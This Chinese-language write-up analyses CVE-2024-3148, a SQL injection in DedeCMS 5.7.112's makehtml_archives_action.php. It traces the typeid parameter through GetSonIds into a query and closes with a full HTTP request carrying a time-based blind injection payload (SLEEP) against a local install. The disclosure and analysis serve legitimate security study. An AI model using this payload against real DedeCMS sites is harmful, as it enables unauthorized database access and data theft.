CVE-2024-3148 DedeCms makehtml_archives_action sql注入漏洞分析

DedeCMS（也称为织梦CMS）是一款基于PHP+MySQL的开源内容管理系统。

在 DedeCMS 5.7.112 中发现一个被归类为严重的漏洞。此漏洞会影响某些未知文件dede/makehtml_archives_action.php的处理。操作导致 sql 注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。.....

官方网站产品下载 / 织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司https://www.dedecms.com/

漏洞分析

文件makehtml_archives_action.php 中

查看传参

跟踪typeid的参数传递

if($typeid!=0) {$ids = GetSonIds($typeid);$gwhere .= " AND typeid in($ids) ";

跟入GetSonIds

/***  获得某id的所有下级id** @param     string  $id  栏目id* @param     string  $channel  模型ID* @param     string  $addthis  是否包含本身* @return    string*/
function GetSonIds($id,$channel=0,$addthis=true)
{global $cfg_Cs;$GLOBALS['idArray'] = array();if( !is_array($cfg_Cs) ){require_once(DEDEDATA."/cache/inc_catalog_base.inc");}GetSonIdsLogic($id,$cfg_Cs,$channel,$addthis);$rquery = join(',',$GLOBALS['idArray']);$rquery = preg_replace("/,$/", '', $rquery); return $rquery;
}

function GetSonIdsLogic($id,$sArr,$channel=0,$addthis=false)
{if($id!=0 && $addthis){$GLOBALS['idArray'][$id] = $id;}if(is_array($sArr)){foreach($sArr as $k=>$v){if( $v[0]==$id && ($channel==0 || $v[1]==$channel )){GetSonIdsLogic($k,$sArr,$channel,true);}}}
}

typeid 成功返回到ids ， $gwhere 欲成为sql语句

//统计记录总数
if($totalnum==0)
{$row = $dsql->GetOne("SELECT COUNT(*) AS dd FROM `#@__arctiny` $idsql");$totalnum = $row['dd'];//清空缓存$dsql->ExecuteNoneQuery("DELETE FROM `#@__arccache` ");
}

将IN运算符与子查询结合使用造成sql注入

漏洞复现

GET /DedeCMS-V5.7.112-UTF8/uploads/dede/makehtml_archives_action.php?typeid=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a) HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1; __test=1; SHIRO_SESSION_ID=ee08a13d-a890-43ed-93c3-4fb9de9fb6be; PHPSESSID=fdnnfrucnlv5sh8kqoir3tlnb3; _csrf_name_c61d67c3=60c09950514e6689f774acb4dd165493; _csrf_name_c61d67c31BH21ANI1AGD297L1FF21LN02BGE1DNG=781fb047d73ff07a; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=9585ea19d96a75fc; DedeLoginTime=1712461558; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=7eea594d91df28cb
Connection: close